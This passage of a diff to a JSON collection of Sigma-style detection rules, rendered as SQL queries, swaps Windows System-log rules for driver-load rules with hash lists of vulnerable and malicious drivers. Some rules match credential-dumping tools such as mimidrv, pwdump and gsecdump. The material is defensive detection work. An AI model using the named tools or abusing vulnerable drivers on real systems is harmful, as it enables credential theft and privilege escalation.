'd8459f7d707c635e2c04d6d6d47b63f73ba3f6629702c7a6e0df0462f6478ae2', '49f75746eebe14e5db11706b3e58accc62d4034d2f1c05c681ecef5d1ad933ba', '7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129', 'ae79e760c739d6214c1e314728a78a6cb6060cce206fde2440a69735d639a0a2', '4422851a0a102f654e95d3b79c357ae3af1b096d7d1576663c027cfbc04abaf9', '84df20b1d9d87e305c92e5ffae21b10b325609d59d835a954dbd8750ef5dabf4', '7a7e8df7173387aec593e4fe2b45520ea3156c5f810d2bb1b2784efd1c922376', 'cd4a249c3ef65af285d0f8f30a8a96e83688486aab515836318a2559757a89bb', '86a8e0aa29a5b52c84921188cc1f0eca9a7904dcfe09544602933d8377720219', '47f0cdaa2359a63ad1389ef4a635f1f6eee1f63bdf6ef177f114bdcdadc2e005', '18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6', '70211a3f90376bbc61f49c22a63075d1d4ddd53f0aefa976216c46e6ba39a9f4', '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1', '8d9a2363b757d3f127b9c6ed8f7b8b018e652369bc070aa3500b3a978feaa6ce', '36875562e747136313ec5db58174e5fab870997a054ca8d3987d181599c7db6a', 
'7877c1b0e7429453b750218ca491c2825dae684ad9616642eff7b41715c70aca', '591bd5e92dfa0117b3daa29750e73e2db25baa717c31217539d30ffb1f7f3a52', '04a85e359525d662338cae86c1e59b1d7aa9bd12b920e8067503723dc1e03162', '4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', 'e81230217988f3e7ec6f89a06d231ec66039bdba340fd8ebb2bbb586506e3293', '49c827cf48efb122a9d6fd87b426482b7496ccd4a2dbca31ebbf6b2b80c98530', 'd8b58f6a89a7618558e37afc360cd772b6731e3ba367f8d58734ecee2244a530', '7ec93f34eb323823eb199fbf8d06219086d517d0e8f4b9e348d7afd41ec9fd5d', '2e6b339597a89e875f175023ed952aaac64e9d20d457bbc07acf1586e7fe2df8', 'cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986', 'a7c2e7910942dd5e43e2f4eb159bcd2b4e71366e34a68109548b9fb12ac0f7cc', 'c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5', '59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347', '89b0017bc30cc026e32b758c66a1af88bd54c6a78e11ec2908ff854e00ac46be', 'e005e8d183e853a27ad3bb56f25489f369c11b0d47e3d4095aad9291b3343bf1', '5f5e5f1c93d961985624768b7c676d488c7c7c1d4c043f6fc1ea1904fefb75be', 'cdd2a4575a46bada4837a6153a79c14d60ee3129830717ef09e0e3efd9d00812', 'ac3f613d457fc4d44fa27b2e0b1baa62c09415705efb5a40a4756da39b3ac165', '475e5016c9c0f5a127896f9179a1b1577a67b357f399ab5a1e68aab07134729a', 'cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64', '0de4247e72d378713bcf22d5c5d3874d079203bb4364e25f67a90d5570bdcce8', '72b99147839bcfb062d29014ec09fe20a8f261748b5925b00171ef3cb849a4c1', 'cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b', 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe', '5ee292b605cd3751a24e5949aae615d472a3c72688632c3040dc311055b75a92', '4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b', 'f8886a9c759e0426e08d55e410b02c5b05af3c287b15970175e4874316ffaf13', 'c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8', '2da330a2088409efc351118445a824f11edbe51cf3d653b298053785097fe40e', 
'54841d9f89e195196e65aa881834804fe3678f1cf6b328cab8703edd15e3ec57', 'e6a7b0bc01a627a7d0ffb07faddb3a4dd96b6f5208ac26107bdaeb3ab1ec8217', 'cf4b5fa853ce809f1924df3a3ae3c4e191878c4ea5248d8785dc7e51807a512b', '6839fcae985774427c65fe38e773aa96ec451a412caa5354ad9e2b9b54ffe6c1', '708016fbe22c813a251098f8f992b177b476bd1bbc48c2ed4a122ff74910a965', '362c4f3dadc9c393682664a139d65d80e32caa2a97b6e0361dfd713a73267ecc', '08eb2d2aa25c5f0af4e72a7e0126735536f6c2c05e9c7437282171afe5e322c6', '2d83ccb1ad9839c9f5b3f10b1f856177df1594c66cbbc7661677d4b462ebf44d', 'c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c', '4941c4298f4560fc1e59d0f16f84bab5c060793700b82be2fd7c63735f1657a8', '1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c', '76fb4deaee57ef30e56c382c92abffe2cf616d08dbecb3368c8ee6b02e59f303', '3a5ec83fe670e5e23aef3afa0a7241053f5b6be5e6ca01766d6b5f9177183c25', '7196187fb1ef8d108b380d37b2af8efdeb3ca1f6eefd37b5dc114c609147216d', 'f461414a2596555cece5cfee65a3c22648db0082ca211f6238af8230e41b3212', '55fee54c0d0d873724864dc0b2a10b38b7f40300ee9cae4d9baaf8a202c4049a', 'b9dad0131c51e2645e761b74a71ebad2bf175645fa9f42a4ab0e6921b83306e3', 'fd223833abffa9cd6cc1848d77599673643585925a7ee51259d67c44d361cce8', 'd5586dc1e61796a9ae5e5d1ced397874753056c3df2eb963a8916287e1929a71', '543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91', '6cb51ae871fbd5d07c5aad6ff8eea43d34063089528603ca9ceb8b4f52f68ddc', '6c7120e40fc850e4715058b233f5ad4527d1084a909114fd6a36b7b7573c4a44', 'e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf', '4a3d4db86f580b1680d6454baee1c1a139e2dde7d55e972ba7c92ec3f555dce2', 'dec8a933dba04463ed9bb7d53338ff87f2c23cfb79e0e988449fc631252c9dcc', '6b5cf41512255237064e9274ca8f8a3fef820c45aa6067c9c6a0e6f5751a0421', 'e83908eba2501a00ef9e74e7d1c8b4ff1279f1cd6051707fd51824f87e4378fa', '0ebaef662b14410c198395b13347e1d175334ec67919709ad37d65eba013adff', '3e9b62d2ea2be50a2da670746c4dbe807db9601980af3a1014bcd72d0248d84c', 
'7d8937c18d6e11a0952e53970a0934cf0e65515637ac24d6ca52ccf4b93d385f', '9d58f640c7295952b71bdcb456cae37213baccdcd3032c1e3aeb54e79081f395', 'aa9ab1195dc866270e984f1bed5e1358d6ef24c515dfdb6c2a92d1e1b94bf608', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'ea0b9eecf4ad5ec8c14aec13de7d661e7615018b1a3c65464bf5eca9bbf6ded3', '31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427', '258359a7fa3d975620c9810dab3a6493972876a024135feaf3ac8482179b2e79', '146d77e80ca70ea5cb17bfc9a5cea92334f809cbdc87a51c2d10b8579a4b9c88', '9790a7b9d624b2b18768bb655dda4a05a9929633cef0b1521e79e40d7de0a05b', 'cb9890d4e303a4c03095d7bc176c42dee1b47d8aa58e2f442ec1514c8f9e3cec', 'cbb8239a765bf5b2c1b6a5c8832d2cab8fef5deacadfb65d8ed43ef56d291ab6', '436ccab6f62fa2d29827916e054ade7acae485b3de1d3e5c6c62d3debf1480e7', 'b9a4e40a5d80fedd1037eaed958f9f9efed41eb01ada73d51b5dcd86e27e0cbf', 'b4d47ea790920a4531e3df5a4b4b0721b7fea6b49a35679f0652f1e590422602', '9fc29480407e5179aa8ea41682409b4ea33f1a42026277613d6484e5419de374', '81c7bb39100d358f8286da5e9aa838606c98dfcc263e9a82ed91cd438cb130d1', '552f70374715e70c4ade591d65177be2539ec60f751223680dfaccb9e0be0ed9', '81939e5c12bd627ff268e9887d6fb57e95e6049f28921f3437898757e7f21469', '4ab41816abbf14d59e75b7fad49e2cb1c1feb27a3cb27402297a2a4793ff9da7', 'af095de15a16255ca1b2c27dad365dff9ac32d2a75e8e288f5a1307680781685', 'b7a20b5f15e1871b392782c46ebcc897929443d82073ee4dcb3874b6a5976b5d', 'ea85bbe63d6f66f7efee7007e770af820d57f914c7f179c5fee3ef2845f19c41', '06a0ec9a316eb89cb041b1907918e3ad3b03842ec65f004f6fa74d57955573a4', '4e3eb5b9bce2fd9f6878ae36288211f0997f6149aa8c290ed91228ba4cdfae80', '314384b40626800b1cde6fbc51ebc7d13e91398be2688c2a58354aa08d00b073', '11bd2c9f9e2397c9a16e0990e4ed2cf0679498fe0fd418a3dfdac60b5c160ee5', '4a9093e8dbcb867e1b97a0a67ce99a8511900658f5201c34ffb8035881f2dbbe', '38fa0c663c8689048726666f1c5e019feaa9da8278f1df6ff62da33961891d2a', '56a3c9ac137d862a85b4004f043d46542a1b61c6acb438098a9640469e2d80e7', 
'455bc98ba32adab8b47d2d89bdbadca4910f91c182ab2fc3211ba07d3784537b', 'e86cb77de7b6a8025f9a546f6c45d135f471e664963cf70b381bee2dfd0fdef4', '3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46', 'b1d96233235a62dbb21b8dbe2d1ae333199669f67664b107bff1ad49b41d9414', 'dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22', '221dfbc74bbb255b0879360ccc71a74b756b2e0f16e9386b38a9ce9d4e2e34f9', 'afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508', '78827fa00ea48d96ac9af8d1c1e317d02ce11793e7f7f6e4c7aac7b5d7dd490f', '7f190f6e5ab0edafd63391506c2360230af4c2d56c45fc8996a168a1fc12d457', 'd5562fb90b0b3deb633ab335bcbd82ce10953466a428b3f27cb5b226b453eaf3', 'fd33fb2735cc5ef466a54807d3436622407287e325276fcd3ed1290c98bd0533', 'f581decc2888ef27ee1ea85ea23bbb5fb2fe6a554266ff5a1476acd1d29d53af', '58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495', 'dde6f28b3f7f2abbee59d4864435108791631e9cb4cdfb1f178e5aa9859956d8', '21ccdd306b5183c00ecfd0475b3152e7d94b921e858e59b68a03e925d1715f21', '91314768da140999e682d2a290d48b78bb25a35525ea12c1b1f9634d14602b2c', '98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8', 'd25904fbf907e19f366d54962ff543d9f53b8fdfd2416c8b9796b6a8dd430e26', '6f1ff29e2e710f6d064dc74e8e011331d807c32cc2a622cbe507fd4b4d43f8f4', '3326e2d32bbabd69feb6024809afc56c7e39241ebe70a53728c77e80995422a5', '8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f', '1d0397c263d51e9fc95bcc8baf98d1a853e1c0401cd0e27c7bf5da3fba1c93a8', '50db5480d0392a7dd6ab5df98389dc24d1ed1e9c98c9c35964b19dabcd6dc67f', '3ec5ad51e6879464dfbccb9f4ed76c6325056a42548d5994ba869da9c4c039a8', '71fe5af0f1564dc187eea8d59c0fbc897712afa07d18316d2080330ba17cf009', 'b47be212352d407d0ef7458a7161c66b47c2aec8391dd101df11e65728337a6a', '3871e16758a1778907667f78589359734f7f62f9dc953ec558946dcdbe6951e3', '65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd', 'a961f5939088238d76757669a9a81905e33f247c9c635b908daac146ae063499', 
'509628b6d16d2428031311d7bd2add8d5f5160e9ecc0cd909f1e82bbbb3234d6', '440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c', '09bedbf7a41e0f8dabe4f41d331db58373ce15b2e9204540873a1884f38bdde1', '1ddfe4756f5db9fb319d6c6da9c41c588a729d9e7817190b027b38e9c076d219', '677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf', '823da894b2c73ffcd39e77366b6f1abf0ae9604d9b20140a54e6d55053aadeba', '05f052c64d192cf69a462a5ec16dda0d43ca5d0245900c9fcb9201685a2e7748', '42f0b036687cbd7717c9efed6991c00d4e3e7b032dc965a2556c02177dfdad0f', 'f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35', '927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a', 'e68d453d333854787f8470c8baef3e0d082f26df5aa19c0493898bcf3401e39a', 'eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b', '88076e98d45ed3adf0c5355411fe8ca793eb7cec1a1c61f5e1ec337eae267463', '9254f012009d55f555418ff85f7d93b184ab7cb0e37aecdfdab62cfe94dea96b'))" ], - "filename": "win_system_vul_cve_2020_1472.yml" + "filename": "driver_load_win_vuln_drivers.yml" }, { - "title": "DHCP Server Loaded the CallOut DLL", - "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", - "status": "test", - "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", - "author": "Dimitrios Slamaris", + "title": "Vulnerable HW Driver Load", + "id": "9bacc538-d1b9-4d42-862e-469eafc05a41", + "status": "experimental", + "description": "Detects the load of a legitimate signed driver named HW.sys by often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\HW.sys' ESCAPE 
'\\' OR (Hashes LIKE '%SHA256=4880F40F2E557CFF38100620B9AA1A3A753CB693AF16CD3D95841583EDCB57A8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=55963284BBD5A3297F39F12F0D8A01ED99FE59D008561E3537BCD4DB4B4268FA%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6A4875AE86131A594019DEC4ABD46AC6BA47E57A88287B814D07D929858FE3E5%' ESCAPE '\\' OR Hashes LIKE '%SHA1=74E4E3006B644392F5FCEA4A9BAE1D9D84714B57%' ESCAPE '\\' OR Hashes LIKE '%SHA1=18F34A0005E82A9A1556BA40B997B0EAE554D5FD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=4E56E0B1D12664C05615C69697A2F5C5D893058A%' ESCAPE '\\' OR Hashes LIKE '%MD5=3247014BA35D406475311A2EAB0C4657%' ESCAPE '\\' OR Hashes LIKE '%MD5=376B1E8957227A3639EC1482900D9B97%' ESCAPE '\\' OR Hashes LIKE '%MD5=45C2D133D41D2732F3653ED615A745C8%' ESCAPE '\\') OR sha256 IN ('4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8', '55963284bbd5a3297f39f12f0d8a01ed99fe59d008561e3537bcd4db4b4268fa', '6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5') OR sha1 IN ('74e4e3006b644392f5fcea4a9bae1d9d84714b57', '18f34a0005e82a9a1556ba40b997b0eae554d5fd', '4e56e0b1d12664c05615c69697a2f5c5d893058a') OR md5 IN ('3247014ba35d406475311a2eab0c4657', '376b1e8957227a3639ec1482900d9b97', '45c2d133d41d2732f3653ed615a745c8'))" ], - "filename": "win_system_susp_dhcp_config.yml" + "filename": "driver_load_win_vuln_hw_driver.yml" }, { - "title": "Windows Pcap Drivers", - "id": "7b687634-ab20-11ea-bb37-0242ac130002", + "title": "Suspicious Driver Load from Temp", + "id": "2c4523d5-d481-4ed0-8ec3-7fbf0cb41a75", "status": "test", - "description": "Detects Windows Pcap driver installation based on a list of associated .sys files.", - "author": "Cian Heasley", + "description": "Detects a driver load from a temporary directory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.credential_access", - "attack.t1040" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "There is a relevant 
set of false positives depending on applications in the environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '4697' AND (ServiceFileName LIKE '%pcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npcap%' ESCAPE '\\' OR ServiceFileName LIKE '%npf%' ESCAPE '\\' OR ServiceFileName LIKE '%nm3%' ESCAPE '\\' OR ServiceFileName LIKE '%ndiscap%' ESCAPE '\\' OR ServiceFileName LIKE '%nmnt%' ESCAPE '\\' OR ServiceFileName LIKE '%windivert%' ESCAPE '\\' OR ServiceFileName LIKE '%USBPcap%' ESCAPE '\\' OR ServiceFileName LIKE '%pktmon%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\Temp\\\\%' ESCAPE '\\'" ], - "filename": "win_system_pcap_drivers.yml" + "filename": "driver_load_win_susp_temp_use.yml" }, { - "title": "Moriya Rootkit - System", - "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "title": "Vulnerable Dell BIOS Update Driver Load", + "id": "21b23707-60d6-41bb-96e3-0f0481b0fed9", "status": "experimental", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", + "description": "Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.privilege_escalation", - "attack.t1543.003" + "cve.2021.21551", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Unknown" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\DBUtil\\_2\\_3.Sys%' ESCAPE '\\' OR (Hashes LIKE '%SHA256=0296E2CE999E67C76352613A718E11516FE1B0EFC3FFDB8918FC999DD76A73A5%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=DDBF5ECCA5C8086AFDE1FB4F551E9E6400E94F4428FE7FB5559DA5CFFA654CC1%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C948AE14761095E4D76B55D9DE86412258BE7AFD%' ESCAPE '\\' OR Hashes LIKE '%SHA1=10B30BDEE43B3A2EC4AA63375577ADE650269D25%' ESCAPE '\\' OR Hashes LIKE '%MD5=C996D7971C49252C582171D9380360F2%' ESCAPE '\\' OR Hashes LIKE '%MD5=D2FD132AB7BBC6BBB87A84F026FA0244%' ESCAPE '\\') OR sha256 IN ('0296e2ce999e67c76352613a718e11516fe1b0efc3ffdb8918fc999dd76a73a5', 'ddbf5ecca5c8086afde1fb4f551e9e6400e94f4428fe7fb5559da5cffa654cc1') OR sha1 IN ('c948ae14761095e4d76b55d9de86412258be7afd', '10b30bdee43b3a2ec4aa63375577ade650269d25') OR md5 IN ('c996d7971c49252c582171d9380360f2', 'd2fd132ab7bbc6bbb87a84f026fa0244'))" ], - "filename": "win_system_moriya_rootkit.yml" + "filename": "driver_load_win_vuln_dell_driver.yml" }, { - "title": "Turla Service Install", - "id": "1df8b3da-b0ac-4d8a-b7c7-6cb7c24160e4", + "title": "PowerShell Scripts Run by a Services", + "id": "46deb5e1-28c9-4905-b2df-51cdcc9e6073", "status": "test", - "description": "This method detects a service install of malicious services mentioned in Carbon Paper - Turla report by ESET", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects powershell script installed as a Service", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.g0010", - "attack.t1543.003" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName IN ('srservice', 'ipvpn', 'hkmsvc'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%powershell%' ESCAPE '\\' OR ImageLoaded LIKE '%pwsh%' ESCAPE '\\')" ], - "filename": "win_system_apt_carbonpaper_turla.yml" + "filename": "driver_load_win_powershell_script_installed_as_service.yml" }, { - "title": "Potential RDP Exploit CVE-2019-0708", - "id": 
"aaa5b30d-f418-420b-83a0-299cb6024885", - "status": "test", - "description": "Detect suspicious error on protocol RDP, potential CVE-2019-0708", - "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", + "title": "Usage Of Malicious POORTRY Signed Driver", + "id": "91bc09e7-674d-4cf5-8d86-ed5d8bdb95a6", + "status": "experimental", + "description": "Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" + "attack.privilege_escalation", + "attack.t1543", + "attack.t1068" ], "falsepositives": [ - "Bad connections or network interruptions" + "Legitimate BIOS driver updates (should be rare)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('56', '50') AND Provider_Name = 'TermDD')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\prokiller64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gftkyj64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\KApcHelper\\_x64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NodeDriver.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\LcTkA.sys%' ESCAPE '\\') OR (Hashes LIKE '%SHA256=0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497%' ESCAPE '\\' OR Hashes LIKE '%SHA1=31cc8718894d6e6ce8c132f68b8caaba39b5ba7a%' ESCAPE '\\' OR Hashes LIKE 
'%SHA1=a804ebec7e341b4d98d9e94f6e4860a55ea1638d%' ESCAPE '\\' OR Hashes LIKE '%SHA1=6debce728bcff73d9d1d334df0c6b1c3735e295c%' ESCAPE '\\' OR Hashes LIKE '%SHA1=cc65bf60600b64feece5575f21ab89e03a728332%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3ef30c95e40a854cc4ded94fc503d0c3dc3e620e%' ESCAPE '\\' OR Hashes LIKE '%SHA1=b2f955b3e6107f831ebe67997f8586d4fe9f3e98%' ESCAPE '\\' OR Hashes LIKE '%MD5=10f3679384a03cb487bda9621ceb5f90%' ESCAPE '\\' OR Hashes LIKE '%MD5=04a88f5974caa621cee18f34300fc08a%' ESCAPE '\\' OR Hashes LIKE '%MD5=6fcf56f6ca3210ec397e55f727353c4a%' ESCAPE '\\' OR Hashes LIKE '%MD5=0f16a43f7989034641fd2de3eb268bf1%' ESCAPE '\\' OR Hashes LIKE '%MD5=ee6b1a79cb6641aa44c762ee90786fe0%' ESCAPE '\\' OR Hashes LIKE '%MD5=909f3fc221acbe999483c87d9ead024a%' ESCAPE '\\') OR sha256 IN ('0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc', '9b1b15a3aacb0e786a608726c3abfc94968915cedcbd239ddf903c4a54bfcf0c', '8e035beb02a411f8a9e92d4cf184ad34f52bbd0a81a50c222cdd4706e4e45104', 'd7c81b0f3c14844f6424e8bdd31a128e773cb96cccef6d05cbff473f0ccb9f9c', '05b146a48a69dd62a02759487e769bd30d39f16374bc76c86453b4ae59e7ffa4', 'c8f9e1ad7b8cce62fba349a00bc168c849d42cfb2ca5b2c6cc4b51d054e0c497') OR sha1 IN ('31cc8718894d6e6ce8c132f68b8caaba39b5ba7a', 'a804ebec7e341b4d98d9e94f6e4860a55ea1638d', '6debce728bcff73d9d1d334df0c6b1c3735e295c', 'cc65bf60600b64feece5575f21ab89e03a728332', '3ef30c95e40a854cc4ded94fc503d0c3dc3e620e', 'b2f955b3e6107f831ebe67997f8586d4fe9f3e98') OR md5 IN ('10f3679384a03cb487bda9621ceb5f90', '04a88f5974caa621cee18f34300fc08a', '6fcf56f6ca3210ec397e55f727353c4a', '0f16a43f7989034641fd2de3eb268bf1', 'ee6b1a79cb6641aa44c762ee90786fe0', '909f3fc221acbe999483c87d9ead024a'))" ], - "filename": "win_system_rdp_potential_cve_2019_0708.yml" + "filename": "driver_load_win_mal_poortry_driver.yml" }, { - "title": "Credential Dumping Tools Service Execution - System", - "id": "4976aa50-8f41-45c6-8b15-ab3fc10e79ed", - "status": "experimental", + "title": "Credential 
Dumping Tools Service Execution", + "id": "df5ff0a5-f83f-4a5b-bba1-3e6a3f6f6ea2", + "status": "test", "description": "Detects well-known credential dumping tools execution via service execution events", "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community", "tags": [ 
@@ -3821,351 +3745,231 @@ "falsepositives": [ "Legitimate Administrator using credential dumping tool for password recovery" ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND (ImagePath LIKE '%fgexec%' ESCAPE '\\' OR ImagePath LIKE '%dumpsvc%' ESCAPE '\\' OR ImagePath LIKE '%cachedump%' ESCAPE '\\' OR ImagePath LIKE '%mimidrv%' ESCAPE '\\' OR ImagePath LIKE '%gsecdump%' ESCAPE '\\' OR ImagePath LIKE '%servpw%' ESCAPE '\\' OR ImagePath LIKE '%pwdump%' ESCAPE '\\'))" - ], - "filename": "win_system_mal_creddumper.yml" - }, - { - "title": "Zerologon Exploitation Using Well-known Tools", - "id": "18f37338-b9bd-4117-a039-280c81f7a596", - "status": "stable", - "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", - "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", - "tags": [ - "attack.t1210", - "attack.lateral_movement" - ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%fgexec%' ESCAPE '\\' OR ImageLoaded LIKE '%dumpsvc%' ESCAPE '\\' OR ImageLoaded LIKE '%cachedump%' ESCAPE '\\' OR ImageLoaded LIKE '%mimidrv%' ESCAPE '\\' OR ImageLoaded LIKE '%gsecdump%' ESCAPE '\\' OR ImageLoaded LIKE '%servpw%' ESCAPE '\\' OR ImageLoaded LIKE '%pwdump%' ESCAPE '\\')" ], - "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" + "filename": "driver_load_win_mal_creddumper.yml" }, { - "title": "New Service Uses Double Ampersand in Path", - "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "title": "Vulnerable WinRing0 Driver Load", + "id": "1a42dfa6-6cb2-4df9-9b48-295be477e835", "status": "experimental", - "description": 
"Detects a service installation that uses a suspicious double ampersand used in the image path value", + "description": "Detects the load of a signed WinRing0 driver often used by threat actors, crypto miners (XMRIG) or malware for privilege escalation", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\WinRing0x64.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinRing0x64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winring00x64.sys' ESCAPE '\\') OR Hashes LIKE '%IMPHASH=D41FA95D4642DC981F10DE36F4DC8CD7%' ESCAPE '\\' OR Imphash = 'd41fa95d4642dc981f10de36f4dc8cd7')" ], - "filename": "win_system_service_install_susp_double_ampersand.yml" + "filename": "driver_load_win_vuln_winring0_driver.yml" }, { - "title": "Service Installed By Unusual Client - System", - "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", + "title": "Vulnerable GIGABYTE Driver Load", + "id": "7bcfeece-e5ed-4ff3-a5fb-2640d8cc8647", "status": "experimental", - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "author": "Tim Rauch", + "description": "Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.privilege_escalation", - "attack.t1543" + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = 
